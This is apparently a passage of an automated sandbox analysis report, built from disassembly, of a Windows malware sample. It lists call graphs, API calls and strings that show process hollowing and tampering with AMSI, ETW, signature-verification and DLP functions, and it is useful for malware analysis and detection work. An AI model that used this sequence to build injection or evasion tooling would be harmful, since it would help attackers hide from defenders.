                                                                                        control_flow_graph 4522 2d85fa0-2d8618a call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 4577 2d86190-2d8638f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d648b0 4522->4577 4578 2d8618b call 2d77be8 4522->4578 4637 2d86b54-2d86cd7 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d648b0 4577->4637 4638 2d86395-2d869b4 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d62ee0 call 2d62f08 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 GetCurrentProcess call 2d77968 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 4577->4638 4578->4577 4727 2d874a8-2d88b96 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 * 16 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 ExitProcess 4637->4727 4728 2d86cdd-2d86cec call 2d648b0 4637->4728 5164 2d869bb-2d86b4f call 2d649bc call 2d7c5bc call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 EnumSystemLocalesA 4638->5164 5165 2d869b6-2d869b9 4638->5165 4728->4727 4736 2d86cf2-2d86fc5 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d7d198 call 2d64824 call 2d64964 call 2d64698 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d67e18 4728->4736 4979 2d86fcb-2d8729d call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d7c74c call 2d644f4 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64da4 * 2 call 2d64728 call 2d7c3f8 4736->4979 4980 2d872a2-2d874a3 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d649bc call 2d77f48 4736->4980 4979->4980 4980->4727 5164->4637 5165->5164
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D62EE0: QueryPerformanceCounter.KERNEL32 ref: 02D62EE4
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC), ref: 02D8681D
                                                                                          • Part of subcall function 02D77968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                          • Part of subcall function 02D77968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                          • Part of subcall function 02D77968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344), ref: 02D86B4F
                                                                                          • Part of subcall function 02D67E18: GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                          • Part of subcall function 02D7C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                          • Part of subcall function 02D7C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                          • Part of subcall function 02D7C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                          • Part of subcall function 02D7C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                        • ExitProcess.KERNEL32(00000000,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,Initialize,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC), ref: 02D88B96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                        • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                        • API String ID: 724724934-2845693168
                                                                                        • Opcode ID: 27bfa696791325dce1b637ba160ccfb1c1828ae8a185d7d0ec98573258900a3b
                                                                                        • Instruction ID: 9d3501eb09e64a356fefe39866bce1358522ea2d132f617fcb26d98f9b84edde
                                                                                        • Opcode Fuzzy Hash: 27bfa696791325dce1b637ba160ccfb1c1828ae8a185d7d0ec98573258900a3b
                                                                                        • Instruction Fuzzy Hash: 2F330F34A502598FDB20FBA4DC949EEB3B6EF85300F5045E5E009EB364DA70AE95CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77F48 Relevance: 43.6, APIs: 8, Strings: 16, Instructions: 1602nativethreadprocessCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 8865 2d77f48-2d77f4b 8866 2d77f50-2d77f55 8865->8866 8866->8866 8867 2d77f57-2d7803e call 2d64954 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 8866->8867 8898 2d78044-2d7811f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 8867->8898 8899 2d799ab-2d79a15 call 2d644c4 * 2 call 2d64c24 call 2d644c4 call 2d644a0 call 2d644c4 * 2 8867->8899 8898->8899 8943 2d78125-2d7844d call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d63098 * 2 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64da4 call 2d64db4 CreateProcessAsUserW 8898->8943 9050 2d784c0-2d787e6 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d62ee0 call 2d62f08 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 GetThreadContext 8943->9050 9051 2d7844f-2d784bb call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 8943->9051 9050->8899 9159 2d787ec-2d78a4f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtReadVirtualMemory 9050->9159 9051->9050 9230 2d78a55-2d78bbe call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtUnmapViewOfSection 9159->9230 9231 2d78d5c-2d78dc7 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 9159->9231 9317 2d78bc0-2d78bdc call 2d77968 9230->9317 9318 2d78be8-2d78c53 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 9230->9318 9257 2d78dcd-2d78f4d call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77968 9231->9257 9258 2d78dc8 call 2d77be8 9231->9258 9257->8899 9362 2d78f53-2d7904c call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77e58 9257->9362 9258->9257 9323 2d78be1-2d78be6 9317->9323 9327 2d78c59-2d78d50 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77968 9318->9327 9358 2d78c54 call 2d77be8 9318->9358 9323->9327 9397 2d78d55-2d78d5a 9327->9397 9358->9327 9411 2d790a0-2d799a6 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtWriteVirtualMemory call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtWriteVirtualMemory call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 SetThreadContext NtResumeThread call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d62c2c call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77ac0 * 3 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77ac0 * 2 call 2d64824 call 2d64964 call 2d647b0 call 2d64964 call 2d77ac0 call 2d64824 call 2d64964 call 2d647b0 call 2d64964 call 2d77ac0 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 9362->9411 9412 2d7904e-2d7909b call 2d77d50 call 2d77d44 9362->9412 9397->9257 9411->8899 9412->9411
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC5398,02DC5388,OpenSession,02DC5360,02D79A30,ScanString,02DC5360), ref: 02D78446
                                                                                        • GetThreadContext.KERNEL32(00000870,02DC53DC,ScanString,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,UacInitialize,02DC5360), ref: 02D787DF
                                                                                        • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,002CCFF8,02DC54B0,00000004,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360), ref: 02D78A3C
                                                                                        • NtUnmapViewOfSection.N(0000087C,00400000,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B0,00000004,02DC54B8), ref: 02D78BB7
                                                                                          • Part of subcall function 02D77968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                          • Part of subcall function 02D77968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                          • Part of subcall function 02D77968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00400000,00000000,1DC54500,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,ScanBuffer,02DC5360), ref: 02D7920B
                                                                                        • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,002CCFF8,02DC54B4,00000004,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,00400000), ref: 02D7937E
                                                                                        • SetThreadContext.KERNEL32(00000870,02DC53DC,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B4,00000004,02DC54B8), ref: 02D794F4
                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000870,00000000,00000870,02DC53DC,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B4), ref: 02D79501
                                                                                          • Part of subcall function 02D77AC0: LoadLibraryW.KERNEL32(bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC,ScanString,02DC5360,02D79A30), ref: 02D77AD2
                                                                                          • Part of subcall function 02D77AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D77ADF
                                                                                          • Part of subcall function 02D77AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize), ref: 02D77AF6
                                                                                          • Part of subcall function 02D77AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC), ref: 02D77B05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                        • API String ID: 2533507481-3678116285
                                                                                        • Opcode ID: 67fb9e229e2d53dca7e23163fcf18075d0c2ea7a0175a04ec1dceade3de7d6d8
                                                                                        • Instruction ID: 3c0f733043452f38362fbd92b144ce4bf9f1ec6562fe5b274fd7934a49f3854a
                                                                                        • Opcode Fuzzy Hash: 67fb9e229e2d53dca7e23163fcf18075d0c2ea7a0175a04ec1dceade3de7d6d8
                                                                                        • Instruction Fuzzy Hash: EEE22F31A411699FEB21EBA0DC94BEE73B6EF45700F1045A6E009BB314EE74AE45CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77F46 Relevance: 43.6, APIs: 8, Strings: 16, Instructions: 1553nativeprocessthreadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 9685 2d77f46-2d77f4b 9687 2d77f50-2d77f55 9685->9687 9687->9687 9688 2d77f57-2d7803e call 2d64954 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 9687->9688 9719 2d78044-2d7811f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 9688->9719 9720 2d799ab-2d79a15 call 2d644c4 * 2 call 2d64c24 call 2d644c4 call 2d644a0 call 2d644c4 * 2 9688->9720 9719->9720 9764 2d78125-2d7844d call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d63098 * 2 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64da4 call 2d64db4 CreateProcessAsUserW 9719->9764 9871 